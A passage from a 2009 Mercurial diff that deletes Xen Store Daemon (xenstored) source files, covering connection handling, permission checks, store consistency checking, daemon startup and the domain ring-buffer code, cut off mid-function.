-       strings = perms_to_strings(node, node->perms, node->num_perms, &len);
-       if (!strings)
-               send_error(conn, errno);
-       else
-               send_reply(conn, XS_GET_PERMS, strings, len);
-}
-
-static void do_set_perms(struct connection *conn, struct buffered_data *in)
-{
-       unsigned int num;
-       struct xs_permissions *perms;
-       char *name, *permstr;
-       struct node *node;
-
-       num = xs_count_strings(in->buffer, in->used);
-       if (num < 2) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       /* First arg is node name. */
-       name = canonicalize(conn, in->buffer);
-       permstr = in->buffer + strlen(in->buffer) + 1;
-       num--;
-
-       /* We must own node to do this (tools can do this too). */
-       node = get_node(conn, name, XS_PERM_WRITE|XS_PERM_OWNER);
-       if (!node) {
-               send_error(conn, errno);
-               return;
-       }
-
-       perms = talloc_array(node, struct xs_permissions, num);
-       if (!xs_strings_to_perms(perms, num, permstr)) {
-               send_error(conn, errno);
-               return;
-       }
-
-       /* Unprivileged domains may not change the owner. */
-       if (domain_is_unprivileged(conn) &&
-           perms[0].id != node->perms[0].id) {
-               send_error(conn, EPERM);
-               return;
-       }
-
-       domain_entry_dec(conn, node);
-       node->perms = perms;
-       node->num_perms = num;
-       domain_entry_inc(conn, node);
-
-       if (!write_node(conn, node)) {
-               send_error(conn, errno);
-               return;
-       }
-
-       add_change_node(conn->transaction, name, false);
-       fire_watches(conn, name, false);
-       send_ack(conn, XS_SET_PERMS);
-}
-
-static void do_debug(struct connection *conn, struct buffered_data *in)
-{
-       int num;
-
-       if (conn->id != 0) {
-               send_error(conn, EACCES);
-               return;
-       }
-
-       num = xs_count_strings(in->buffer, in->used);
-
-       if (streq(in->buffer, "print")) {
-               if (num < 2) {
-                       send_error(conn, EINVAL);
-                       return;
-               }
-               xprintf("debug: %s", in->buffer + get_string(in, 0));
-       }
-
-       if (streq(in->buffer, "check"))
-               check_store();
-
-       send_ack(conn, XS_DEBUG);
-}
-
-/* Process "in" for conn: "in" will vanish after this conversation, so
- * we can talloc off it for temporary variables.  May free "conn".
- */
-static void process_message(struct connection *conn, struct buffered_data *in)
-{
-       struct transaction *trans;
-
-       trans = transaction_lookup(conn, in->hdr.msg.tx_id);
-       if (IS_ERR(trans)) {
-               send_error(conn, -PTR_ERR(trans));
-               return;
-       }
-
-       assert(conn->transaction == NULL);
-       conn->transaction = trans;
-
-       switch (in->hdr.msg.type) {
-       case XS_DIRECTORY:
-               send_directory(conn, onearg(in));
-               break;
-
-       case XS_READ:
-               do_read(conn, onearg(in));
-               break;
-
-       case XS_WRITE:
-               do_write(conn, in);
-               break;
-
-       case XS_MKDIR:
-               do_mkdir(conn, onearg(in));
-               break;
-
-       case XS_RM:
-               do_rm(conn, onearg(in));
-               break;
-
-       case XS_GET_PERMS:
-               do_get_perms(conn, onearg(in));
-               break;
-
-       case XS_SET_PERMS:
-               do_set_perms(conn, in);
-               break;
-
-       case XS_DEBUG:
-               do_debug(conn, in);
-               break;
-
-       case XS_WATCH:
-               do_watch(conn, in);
-               break;
-
-       case XS_UNWATCH:
-               do_unwatch(conn, in);
-               break;
-
-       case XS_TRANSACTION_START:
-               do_transaction_start(conn, in);
-               break;
-
-       case XS_TRANSACTION_END:
-               do_transaction_end(conn, onearg(in));
-               break;
-
-       case XS_INTRODUCE:
-               do_introduce(conn, in);
-               break;
-
-       case XS_IS_DOMAIN_INTRODUCED:
-               do_is_domain_introduced(conn, onearg(in));
-               break;
-
-       case XS_RELEASE:
-               do_release(conn, onearg(in));
-               break;
-
-       case XS_GET_DOMAIN_PATH:
-               do_get_domain_path(conn, onearg(in));
-               break;
-
-       case XS_RESUME:
-               do_resume(conn, onearg(in));
-               break;
-
-       case XS_SET_TARGET:
-               do_set_target(conn, in);
-               break;
-
-       default:
-               eprintf("Client unknown operation %i", in->hdr.msg.type);
-               send_error(conn, ENOSYS);
-               break;
-       }
-
-       conn->transaction = NULL;
-}
-
-static void consider_message(struct connection *conn)
-{
-       if (verbose)
-               xprintf("Got message %s len %i from %p\n",
-                       sockmsg_string(conn->in->hdr.msg.type),
-                       conn->in->hdr.msg.len, conn);
-
-       process_message(conn, conn->in);
-
-       talloc_free(conn->in);
-       conn->in = new_buffer(conn);
-}
-
-/* Errors in reading or allocating here mean we get out of sync, so we
- * drop the whole client connection. */
-static void handle_input(struct connection *conn)
-{
-       int bytes;
-       struct buffered_data *in = conn->in;
-
-       /* Not finished header yet? */
-       if (in->inhdr) {
-               bytes = conn->read(conn, in->hdr.raw + in->used,
-                                  sizeof(in->hdr) - in->used);
-               if (bytes < 0)
-                       goto bad_client;
-               in->used += bytes;
-               if (in->used != sizeof(in->hdr))
-                       return;
-
-               if (in->hdr.msg.len > XENSTORE_PAYLOAD_MAX) {
-                       syslog(LOG_ERR, "Client tried to feed us %i",
-                              in->hdr.msg.len);
-                       goto bad_client;
-               }
-
-               in->buffer = talloc_array(in, char, in->hdr.msg.len);
-               if (!in->buffer)
-                       goto bad_client;
-               in->used = 0;
-               in->inhdr = false;
-               return;
-       }
-
-       bytes = conn->read(conn, in->buffer + in->used,
-                          in->hdr.msg.len - in->used);
-       if (bytes < 0)
-               goto bad_client;
-
-       in->used += bytes;
-       if (in->used != in->hdr.msg.len)
-               return;
-
-       trace_io(conn, in, 0);
-       consider_message(conn);
-       return;
-
-bad_client:
-       /* Kill it. */
-       talloc_free(conn);
-}
-
-static void handle_output(struct connection *conn)
-{
-       if (!write_messages(conn))
-               talloc_free(conn);
-}
-
-struct connection *new_connection(connwritefn_t *write, connreadfn_t *read)
-{
-       struct connection *new;
-
-       new = talloc_zero(talloc_autofree_context(), struct connection);
-       if (!new)
-               return NULL;
-
-       new->fd = -1;
-       new->write = write;
-       new->read = read;
-       new->can_write = true;
-       new->transaction_started = 0;
-       INIT_LIST_HEAD(&new->out_list);
-       INIT_LIST_HEAD(&new->watches);
-       INIT_LIST_HEAD(&new->transaction_list);
-
-       new->in = new_buffer(new);
-       if (new->in == NULL) {
-               talloc_free(new);
-               return NULL;
-       }
-
-       list_add_tail(&new->list, &connections);
-       talloc_set_destructor(new, destroy_conn);
-       trace_create(new, "connection");
-       return new;
-}
-
-static int writefd(struct connection *conn, const void *data, unsigned int len)
-{
-       int rc;
-
-       while ((rc = write(conn->fd, data, len)) < 0) {
-               if (errno == EAGAIN) {
-                       rc = 0;
-                       break;
-               }
-               if (errno != EINTR)
-                       break;
-       }
-
-       return rc;
-}
-
-static int readfd(struct connection *conn, void *data, unsigned int len)
-{
-       int rc;
-
-       while ((rc = read(conn->fd, data, len)) < 0) {
-               if (errno == EAGAIN) {
-                       rc = 0;
-                       break;
-               }
-               if (errno != EINTR)
-                       break;
-       }
-
-       /* Reading zero length means we're done with this connection. */
-       if ((rc == 0) && (len != 0)) {
-               errno = EBADF;
-               rc = -1;
-       }
-
-       return rc;
-}
-
-static void accept_connection(int sock, bool canwrite)
-{
-       int fd;
-       struct connection *conn;
-
-       fd = accept(sock, NULL, NULL);
-       if (fd < 0)
-               return;
-
-       conn = new_connection(writefd, readfd);
-       if (conn) {
-               conn->fd = fd;
-               conn->can_write = canwrite;
-       } else
-               close(fd);
-}
-
-#define TDB_FLAGS 0
-
-/* We create initial nodes manually. */
-static void manual_node(const char *name, const char *child)
-{
-       struct node *node;
-       struct xs_permissions perms = { .id = 0, .perms = XS_PERM_NONE };
-
-       node = talloc_zero(NULL, struct node);
-       node->name = name;
-       node->perms = &perms;
-       node->num_perms = 1;
-       node->children = (char *)child;
-       if (child)
-               node->childlen = strlen(child) + 1;
-
-       if (!write_node(NULL, node))
-               barf_perror("Could not create initial node %s", name);
-       talloc_free(node);
-}
-
-static void setup_structure(void)
-{
-       char *tdbname;
-       tdbname = talloc_strdup(talloc_autofree_context(), xs_daemon_tdb());
-       tdb_ctx = tdb_open(tdbname, 0, TDB_FLAGS, O_RDWR, 0);
-
-       if (tdb_ctx) {
-               /* XXX When we make xenstored able to restart, this will have
-                  to become cleverer, checking for existing domains and not
-                  removing the corresponding entries, but for now xenstored
-                  cannot be restarted without losing all the registered
-                  watches, which breaks all the backend drivers anyway.  We
-                  can therefore get away with just clearing /local and
-                  expecting Xend to put the appropriate entries back in.
-
-                  When this change is made it is important to note that
-                  dom0's entries must be cleaned up on reboot _before_ this
-                  daemon starts, otherwise the backend drivers and dom0's
-                  balloon driver will pick up stale entries.  In the case of
-                  the balloon driver, this can be fatal.
-               */
-               char *tlocal = talloc_strdup(NULL, "/local");
-
-               check_store();
-
-               if (remove_local) {
-                       internal_rm("/local");
-                       create_node(NULL, tlocal, NULL, 0);
-
-                       check_store();
-               }
-
-               talloc_free(tlocal);
-       }
-       else {
-               tdb_ctx = tdb_open(tdbname, 7919, TDB_FLAGS, O_RDWR|O_CREAT,
-                                  0640);
-               if (!tdb_ctx)
-                       barf_perror("Could not create tdb file %s", tdbname);
-
-               manual_node("/", "tool");
-               manual_node("/tool", "xenstored");
-               manual_node("/tool/xenstored", NULL);
-
-               check_store();
-       }
-}
-
-
-static unsigned int hash_from_key_fn(void *k)
-{
-       char *str = k;
-       unsigned int hash = 5381;
-       char c;
-
-       while ((c = *str++))
-               hash = ((hash << 5) + hash) + (unsigned int)c;
-
-       return hash;
-}
-
-
-static int keys_equal_fn(void *key1, void *key2)
-{
-       return 0 == strcmp((char *)key1, (char *)key2);
-}
-
-
-static char *child_name(const char *s1, const char *s2)
-{
-       if (strcmp(s1, "/")) {
-               return talloc_asprintf(NULL, "%s/%s", s1, s2);
-       }
-       else {
-               return talloc_asprintf(NULL, "/%s", s2);
-       }
-}
-
-
-static void remember_string(struct hashtable *hash, const char *str)
-{
-       char *k = malloc(strlen(str) + 1);
-       strcpy(k, str);
-       hashtable_insert(hash, k, (void *)1);
-}
-
-
-/**
- * A node has a children field that names the children of the node, separated
- * by NULs.  We check whether there are entries in there that are duplicated
- * (and if so, delete the second one), and whether there are any that do not
- * have a corresponding child node (and if so, delete them).  Each valid child
- * is then recursively checked.
- *
- * No deleting is performed if the recovery flag is cleared (i.e. -R was
- * passed on the command line).
- *
- * As we go, we record each node in the given reachable hashtable.  These
- * entries will be used later in clean_store.
- */
-static void check_store_(const char *name, struct hashtable *reachable)
-{
-       struct node *node = read_node(NULL, name);
-
-       if (node) {
-               size_t i = 0;
-
-               struct hashtable * children =
-                       create_hashtable(16, hash_from_key_fn, keys_equal_fn);
-
-               remember_string(reachable, name);
-
-               while (i < node->childlen) {
-                       size_t childlen = strlen(node->children + i);
-                       char * childname = child_name(node->name,
-                                                     node->children + i);
-                       struct node *childnode = read_node(NULL, childname);
-                       
-                       if (childnode) {
-                               if (hashtable_search(children, childname)) {
-                                       log("check_store: '%s' is duplicated!",
-                                           childname);
-
-                                       if (recovery) {
-                                               remove_child_entry(NULL, node,
-                                                                  i);
-                                               i -= childlen + 1;
-                                       }
-                               }
-                               else {
-                                       remember_string(children, childname);
-                                       check_store_(childname, reachable);
-                               }
-                       }
-                       else {
-                               log("check_store: No child '%s' found!\n",
-                                   childname);
-
-                               if (recovery) {
-                                       remove_child_entry(NULL, node, i);
-                                       i -= childlen + 1;
-                               }
-                       }
-
-                       talloc_free(childnode);
-                       talloc_free(childname);
-                       i += childlen + 1;
-               }
-
-               hashtable_destroy(children, 0 /* Don't free values (they are
-                                                all (void *)1) */);
-               talloc_free(node);
-       }
-       else {
-               /* Impossible, because no database should ever be without the
-                  root, and otherwise, we've just checked in our caller
-                  (which made a recursive call to get here). */
-                  
-               log("check_store: No child '%s' found: impossible!", name);
-       }
-}
-
-
-/**
- * Helper to clean_store below.
- */
-static int clean_store_(TDB_CONTEXT *tdb, TDB_DATA key, TDB_DATA val,
-                       void *private)
-{
-       struct hashtable *reachable = private;
-       char * name = talloc_strndup(NULL, key.dptr, key.dsize);
-
-       if (!hashtable_search(reachable, name)) {
-               log("clean_store: '%s' is orphaned!", name);
-               if (recovery) {
-                       tdb_delete(tdb, key);
-               }
-       }
-
-       talloc_free(name);
-
-       return 0;
-}
-
-
-/**
- * Given the list of reachable nodes, iterate over the whole store, and
- * remove any that were not reached.
- */
-static void clean_store(struct hashtable *reachable)
-{
-       tdb_traverse(tdb_ctx, &clean_store_, reachable);
-}
-
-
-static void check_store(void)
-{
-       char * root = talloc_strdup(NULL, "/");
-       struct hashtable * reachable =
-               create_hashtable(16, hash_from_key_fn, keys_equal_fn);
- 
-       log("Checking store ...");
-       check_store_(root, reachable);
-       clean_store(reachable);
-       log("Checking store complete.");
-
-       hashtable_destroy(reachable, 0 /* Don't free values (they are all
-                                         (void *)1) */);
-       talloc_free(root);
-}
-
-
-/* Something is horribly wrong: check the store. */
-static void corrupt(struct connection *conn, const char *fmt, ...)
-{
-       va_list arglist;
-       char *str;
-       int saved_errno = errno;
-
-       va_start(arglist, fmt);
-       str = talloc_vasprintf(NULL, fmt, arglist);
-       va_end(arglist);
-
-       log("corruption detected by connection %i: err %s: %s",
-           conn ? (int)conn->id : -1, strerror(saved_errno), str);
-
-       check_store();
-}
-
-
-static void write_pidfile(const char *pidfile)
-{
-       char buf[100];
-       int len;
-       int fd;
-
-       fd = open(pidfile, O_RDWR | O_CREAT, 0600);
-       if (fd == -1)
-               barf_perror("Opening pid file %s", pidfile);
-
-       /* We exit silently if daemon already running. */
-       if (lockf(fd, F_TLOCK, 0) == -1)
-               exit(0);
-
-       len = snprintf(buf, sizeof(buf), "%ld\n", (long)getpid());
-       if (write(fd, buf, len) != len)
-               barf_perror("Writing pid file %s", pidfile);
-}
-
-/* Stevens. */
-static void daemonize(void)
-{
-       pid_t pid;
-
-       /* Separate from our parent via fork, so init inherits us. */
-       if ((pid = fork()) < 0)
-               barf_perror("Failed to fork daemon");
-       if (pid != 0)
-               exit(0);
-
-       /* Session leader so ^C doesn't whack us. */
-       setsid();
-
-       /* Let session leader exit so child cannot regain CTTY */
-       if ((pid = fork()) < 0)
-               barf_perror("Failed to fork daemon");
-       if (pid != 0)
-               exit(0);
-
-       /* Move off any mount points we might be in. */
-       if (chdir("/") == -1)
-               barf_perror("Failed to chdir");
-
-       /* Discard our parent's old-fashioned umask prejudices. */
-       umask(0);
-}
-
-
-static void usage(void)
-{
-       fprintf(stderr,
-"Usage:\n"
-"\n"
-"  xenstored <options>\n"
-"\n"
-"where options may include:\n"
-"\n"
-"  --no-domain-init    to state that xenstored should not initialise dom0,\n"
-"  --pid-file <file>   giving a file for the daemon's pid to be written,\n"
-"  --help              to output this message,\n"
-"  --no-fork           to request that the daemon does not fork,\n"
-"  --output-pid        to request that the pid of the daemon is output,\n"
-"  --trace-file <file> giving the file for logging, and\n"
-"  --entry-nb <nb>     limit the number of entries per domain,\n"
-"  --entry-size <size> limit the size of entry per domain, and\n"
-"  --entry-watch <nb>  limit the number of watches per domain,\n"
-"  --transaction <nb>  limit the number of transaction allowed per domain,\n"
-"  --no-recovery       to request that no recovery should be attempted when\n"
-"                      the store is corrupted (debug only),\n"
-"  --preserve-local    to request that /local is preserved on start-up,\n"
-"  --verbose           to request verbose execution.\n");
-}
-
-
-static struct option options[] = {
-       { "no-domain-init", 0, NULL, 'D' },
-       { "entry-nb", 1, NULL, 'E' },
-       { "pid-file", 1, NULL, 'F' },
-       { "help", 0, NULL, 'H' },
-       { "no-fork", 0, NULL, 'N' },
-       { "output-pid", 0, NULL, 'P' },
-       { "entry-size", 1, NULL, 'S' },
-       { "trace-file", 1, NULL, 'T' },
-       { "transaction", 1, NULL, 't' },
-       { "no-recovery", 0, NULL, 'R' },
-       { "preserve-local", 0, NULL, 'L' },
-       { "verbose", 0, NULL, 'V' },
-       { "watch-nb", 1, NULL, 'W' },
-       { NULL, 0, NULL, 0 } };
-
-extern void dump_conn(struct connection *conn); 
-
-int main(int argc, char *argv[])
-{
-       int opt, *sock, *ro_sock, max;
-       struct sockaddr_un addr;
-       fd_set inset, outset;
-       bool dofork = true;
-       bool outputpid = false;
-       bool no_domain_init = false;
-       const char *pidfile = NULL;
-       int evtchn_fd = -1;
-       struct timeval *timeout;
-
-       while ((opt = getopt_long(argc, argv, "DE:F:HNPS:t:T:RLVW:", options,
-                                 NULL)) != -1) {
-               switch (opt) {
-               case 'D':
-                       no_domain_init = true;
-                       break;
-               case 'E':
-                       quota_nb_entry_per_domain = strtol(optarg, NULL, 10);
-                       break;
-               case 'F':
-                       pidfile = optarg;
-                       break;
-               case 'H':
-                       usage();
-                       return 0;
-               case 'N':
-                       dofork = false;
-                       break;
-               case 'P':
-                       outputpid = true;
-                       break;
-               case 'R':
-                       recovery = false;
-                       break;
-               case 'L':
-                       remove_local = false;
-                       break;
-               case 'S':
-                       quota_max_entry_size = strtol(optarg, NULL, 10);
-                       break;
-               case 't':
-                       quota_max_transaction = strtol(optarg, NULL, 10);
-                       break;
-               case 'T':
-                       tracefile = optarg;
-                       break;
-               case 'V':
-                       verbose = true;
-                       break;
-               case 'W':
-                       quota_nb_watch_per_domain = strtol(optarg, NULL, 10);
-                       break;
-               }
-       }
-       if (optind != argc)
-               barf("%s: No arguments desired", argv[0]);
-
-       reopen_log();
-
-       /* make sure xenstored directory exists */
-       if (mkdir(xs_daemon_rundir(), 0755)) {
-               if (errno != EEXIST) {
-                       perror("error: mkdir daemon rundir");
-                       exit(-1);
-               }
-       }
-
-       if (mkdir(xs_daemon_rootdir(), 0755)) {
-               if (errno != EEXIST) {
-                       perror("error: mkdir daemon rootdir");
-                       exit(-1);
-               }
-       }
-
-       if (dofork) {
-               openlog("xenstored", 0, LOG_DAEMON);
-               daemonize();
-       }
-       if (pidfile)
-               write_pidfile(pidfile);
-
-       /* Talloc leak reports go to stderr, which is closed if we fork. */
-       if (!dofork)
-               talloc_enable_leak_report_full();
-
-       /* Create sockets for them to listen to. */
-       sock = talloc(talloc_autofree_context(), int);
-       *sock = socket(PF_UNIX, SOCK_STREAM, 0);
-       if (*sock < 0)
-               barf_perror("Could not create socket");
-       ro_sock = talloc(talloc_autofree_context(), int);
-       *ro_sock = socket(PF_UNIX, SOCK_STREAM, 0);
-       if (*ro_sock < 0)
-               barf_perror("Could not create socket");
-       talloc_set_destructor(sock, destroy_fd);
-       talloc_set_destructor(ro_sock, destroy_fd);
-
-       /* Don't kill us with SIGPIPE. */
-       signal(SIGPIPE, SIG_IGN);
-
-       /* FIXME: Be more sophisticated, don't mug running daemon. */
-       unlink(xs_daemon_socket());
-       unlink(xs_daemon_socket_ro());
-
-       addr.sun_family = AF_UNIX;
-       strcpy(addr.sun_path, xs_daemon_socket());
-       if (bind(*sock, (struct sockaddr *)&addr, sizeof(addr)) != 0)
-               barf_perror("Could not bind socket to %s", xs_daemon_socket());
-       strcpy(addr.sun_path, xs_daemon_socket_ro());
-       if (bind(*ro_sock, (struct sockaddr *)&addr, sizeof(addr)) != 0)
-               barf_perror("Could not bind socket to %s",
-                           xs_daemon_socket_ro());
-       if (chmod(xs_daemon_socket(), 0600) != 0
-           || chmod(xs_daemon_socket_ro(), 0660) != 0)
-               barf_perror("Could not chmod sockets");
-
-       if (listen(*sock, 1) != 0
-           || listen(*ro_sock, 1) != 0)
-               barf_perror("Could not listen on sockets");
-
-       if (pipe(reopen_log_pipe)) {
-               barf_perror("pipe");
-       }
-
-       /* Setup the database */
-       setup_structure();
-
-       /* Listen to hypervisor. */
-       if (!no_domain_init)
-               domain_init();
-
-       /* Restore existing connections. */
-       restore_existing_connections();
-
-       if (outputpid) {
-               printf("%ld\n", (long)getpid());
-               fflush(stdout);
-       }
-
-       /* redirect to /dev/null now we're ready to accept connections */
-       if (dofork) {
-               int devnull = open("/dev/null", O_RDWR);
-               if (devnull == -1)
-                       barf_perror("Could not open /dev/null\n");
-               dup2(devnull, STDIN_FILENO);
-               dup2(devnull, STDOUT_FILENO);
-               dup2(devnull, STDERR_FILENO);
-               close(devnull);
-               xprintf = trace;
-       }
-
-       signal(SIGHUP, trigger_reopen_log);
-
-       if (xce_handle != -1)
-               evtchn_fd = xc_evtchn_fd(xce_handle);
-
-       /* Get ready to listen to the tools. */
-       max = initialize_set(&inset, &outset, *sock, *ro_sock, &timeout);
-
-       /* Tell the kernel we're up and running. */
-       xenbus_notify_running();
-
-       /* Main loop. */
-       for (;;) {
-               struct connection *conn, *next;
-
-               if (select(max+1, &inset, &outset, NULL, timeout) < 0) {
-                       if (errno == EINTR)
-                               continue;
-                       barf_perror("Select failed");
-               }
-
-               if (FD_ISSET(reopen_log_pipe[0], &inset)) {
-                       char c;
-                       if (read(reopen_log_pipe[0], &c, 1) != 1)
-                               barf_perror("read failed");
-                       reopen_log();
-               }
-
-               if (FD_ISSET(*sock, &inset))
-                       accept_connection(*sock, true);
-
-               if (FD_ISSET(*ro_sock, &inset))
-                       accept_connection(*ro_sock, false);
-
-               if (evtchn_fd != -1 && FD_ISSET(evtchn_fd, &inset))
-                       handle_event();
-
-               next = list_entry(connections.next, typeof(*conn), list);
-               while (&next->list != &connections) {
-                       conn = next;
-
-                       next = list_entry(conn->list.next,
-                                         typeof(*conn), list);
-
-                       if (conn->domain) {
-                               talloc_increase_ref_count(conn);
-                               if (domain_can_read(conn))
-                                       handle_input(conn);
-                               if (talloc_free(conn) == 0)
-                                       continue;
-
-                               talloc_increase_ref_count(conn);
-                               if (domain_can_write(conn) &&
-                                   !list_empty(&conn->out_list))
-                                       handle_output(conn);
-                               if (talloc_free(conn) == 0)
-                                       continue;
-                       } else {
-                               talloc_increase_ref_count(conn);
-                               if (FD_ISSET(conn->fd, &inset))
-                                       handle_input(conn);
-                               if (talloc_free(conn) == 0)
-                                       continue;
-
-                               talloc_increase_ref_count(conn);
-                               if (FD_ISSET(conn->fd, &outset))
-                                       handle_output(conn);
-                               if (talloc_free(conn) == 0)
-                                       continue;
-                       }
-               }
-
-               max = initialize_set(&inset, &outset, *sock, *ro_sock,
-                                    &timeout);
-       }
-}
-
-/*
- * Local variables:
- *  c-file-style: "linux"
- *  indent-tabs-mode: t
- *  c-indent-level: 8
- *  c-basic-offset: 8
- *  tab-width: 8
- * End:
- */
diff -r 10a8fae412c5 tools/xenstore/xenstored_core.h
--- a/tools/xenstore/xenstored_core.h   Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,191 +0,0 @@
-/* 
-    Internal interfaces for Xen Store Daemon.
-    Copyright (C) 2005 Rusty Russell IBM Corporation
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program; if not, write to the Free Software
-    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-
-#ifndef _XENSTORED_CORE_H
-#define _XENSTORED_CORE_H
-
-#include <xenctrl.h>
-
-#include <sys/types.h>
-#include <dirent.h>
-#include <stdbool.h>
-#include <stdint.h>
-#include <errno.h>
-#include "xs_lib.h"
-#include "list.h"
-#include "tdb.h"
-
-struct buffered_data
-{
-       struct list_head list;
-
-       /* Are we still doing the header? */
-       bool inhdr;
-
-       /* How far are we? */
-       unsigned int used;
-
-       union {
-               struct xsd_sockmsg msg;
-               char raw[sizeof(struct xsd_sockmsg)];
-       } hdr;
-
-       /* The actual data. */
-       char *buffer;
-};
-
-struct connection;
-typedef int connwritefn_t(struct connection *, const void *, unsigned int);
-typedef int connreadfn_t(struct connection *, void *, unsigned int);
-
-struct connection
-{
-       struct list_head list;
-
-       /* The file descriptor we came in on. */
-       int fd;
-
-       /* Who am I? 0 for socket connections. */
-       unsigned int id;
-
-       /* Is this a read-only connection? */
-       bool can_write;
-
-       /* Buffered incoming data. */
-       struct buffered_data *in;
-
-       /* Buffered output data */
-       struct list_head out_list;
-
-       /* Transaction context for current request (NULL if none). */
-       struct transaction *transaction;
-
-       /* List of in-progress transactions. */
-       struct list_head transaction_list;
-       uint32_t next_transaction_id;
-       unsigned int transaction_started;
-
-       /* The domain I'm associated with, if any. */
-       struct domain *domain;
-
-        /* The target of the domain I'm associated with. */
-        struct connection *target;
-
-       /* My watches. */
-       struct list_head watches;
-
-       /* Methods for communicating over this connection: write can be NULL */
-       connwritefn_t *write;
-       connreadfn_t *read;
-};
-extern struct list_head connections;
-
-struct node {
-       const char *name;
-
-       /* Database I came from */
-       TDB_CONTEXT *tdb;
-
-       /* Parent (optional) */
-       struct node *parent;
-
-       /* Permissions. */
-       unsigned int num_perms;
-       struct xs_permissions *perms;
-
-       /* Contents. */
-       unsigned int datalen;
-       void *data;
-
-       /* Children, each nul-terminated. */
-       unsigned int childlen;
-       char *children;
-};
-
-/* Break input into vectors, return the number, fill in up to num of them. */
-unsigned int get_strings(struct buffered_data *data,
-                        char *vec[], unsigned int num);
-
-/* Is child node a child or equal to parent node? */
-bool is_child(const char *child, const char *parent);
-
-void send_reply(struct connection *conn, enum xsd_sockmsg_type type,
-               const void *data, unsigned int len);
-
-/* Some routines (write, mkdir, etc) just need a non-error return */
-void send_ack(struct connection *conn, enum xsd_sockmsg_type type);
-
-/* Send an error: error is usually "errno". */
-void send_error(struct connection *conn, int error);
-
-/* Canonicalize this path if possible. */
-char *canonicalize(struct connection *conn, const char *node);
-
-/* Check if node is an event node. */
-bool check_event_node(const char *node);
-
-/* Get this node, checking we have permissions. */
-struct node *get_node(struct connection *conn,
-                     const char *name,
-                     enum xs_perm_type perm);
-
-/* Get TDB context for this connection */
-TDB_CONTEXT *tdb_context(struct connection *conn);
-
-/* Destructor for tdbs: required for transaction code */
-int destroy_tdb(void *_tdb);
-
-/* Replace the tdb: required for transaction code */
-bool replace_tdb(const char *newname, TDB_CONTEXT *newtdb);
-
-struct connection *new_connection(connwritefn_t *write, connreadfn_t *read);
-
-
-/* Is this a valid node name? */
-bool is_valid_nodename(const char *node);
-
-/* Tracing infrastructure. */
-void trace_create(const void *data, const char *type);
-void trace_destroy(const void *data, const char *type);
-void trace_watch_timeout(const struct connection *conn, const char *node, 
const char *token);
-void trace(const char *fmt, ...);
-void dtrace_io(const struct connection *conn, const struct buffered_data 
*data, int out);
-
-extern int event_fd;
-
-/* Map the kernel's xenstore page. */
-void *xenbus_map(void);
-
-/* Return the event channel used by xenbus. */
-evtchn_port_t xenbus_evtchn(void);
-
-/* Tell the kernel xenstored is running. */
-void xenbus_notify_running(void);
-
-#endif /* _XENSTORED_CORE_H */
-
-/*
- * Local variables:
- *  c-file-style: "linux"
- *  indent-tabs-mode: t
- *  c-indent-level: 8
- *  c-basic-offset: 8
- *  tab-width: 8
- * End:
- */
diff -r 10a8fae412c5 tools/xenstore/xenstored_domain.c
--- a/tools/xenstore/xenstored_domain.c Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,710 +0,0 @@
-/*
-    Domain communications for Xen Store Daemon.
-    Copyright (C) 2005 Rusty Russell IBM Corporation
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program; if not, write to the Free Software
-    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-
-#include <stdio.h>
-#include <sys/mman.h>
-#include <unistd.h>
-#include <stdlib.h>
-#include <stdarg.h>
-
-#include "utils.h"
-#include "talloc.h"
-#include "xenstored_core.h"
-#include "xenstored_domain.h"
-#include "xenstored_transaction.h"
-#include "xenstored_watch.h"
-
-#include <xenctrl.h>
-
-static int *xc_handle;
-static evtchn_port_t virq_port;
-
-int xce_handle = -1; 
-
-struct domain
-{
-       struct list_head list;
-
-       /* The id of this domain */
-       unsigned int domid;
-
-       /* Event channel port */
-       evtchn_port_t port;
-
-       /* The remote end of the event channel, used only to validate
-          repeated domain introductions. */
-       evtchn_port_t remote_port;
-
-       /* The mfn associated with the event channel, used only to validate
-          repeated domain introductions. */
-       unsigned long mfn;
-
-       /* Domain path in store. */
-       char *path;
-
-       /* Shared page. */
-       struct xenstore_domain_interface *interface;
-
-       /* The connection associated with this. */
-       struct connection *conn;
-
-       /* Have we noticed that this domain is shutdown? */
-       int shutdown;
-
-       /* number of entry from this domain in the store */
-       int nbentry;
-
-       /* number of watch for this domain */
-       int nbwatch;
-};
-
-static LIST_HEAD(domains);
-
-static bool check_indexes(XENSTORE_RING_IDX cons, XENSTORE_RING_IDX prod)
-{
-       return ((prod - cons) <= XENSTORE_RING_SIZE);
-}
-
-static void *get_output_chunk(XENSTORE_RING_IDX cons,
-                             XENSTORE_RING_IDX prod,
-                             char *buf, uint32_t *len)
-{
-       *len = XENSTORE_RING_SIZE - MASK_XENSTORE_IDX(prod);
-       if ((XENSTORE_RING_SIZE - (prod - cons)) < *len)
-               *len = XENSTORE_RING_SIZE - (prod - cons);
-       return buf + MASK_XENSTORE_IDX(prod);
-}
-
-static const void *get_input_chunk(XENSTORE_RING_IDX cons,
-                                  XENSTORE_RING_IDX prod,
-                                  const char *buf, uint32_t *len)
-{
-       *len = XENSTORE_RING_SIZE - MASK_XENSTORE_IDX(cons);
-       if ((prod - cons) < *len)
-               *len = prod - cons;
-       return buf + MASK_XENSTORE_IDX(cons);
-}
-
-static int writechn(struct connection *conn,
-                   const void *data, unsigned int len)
-{
-       uint32_t avail;
-       void *dest;
-       struct xenstore_domain_interface *intf = conn->domain->interface;
-       XENSTORE_RING_IDX cons, prod;
-
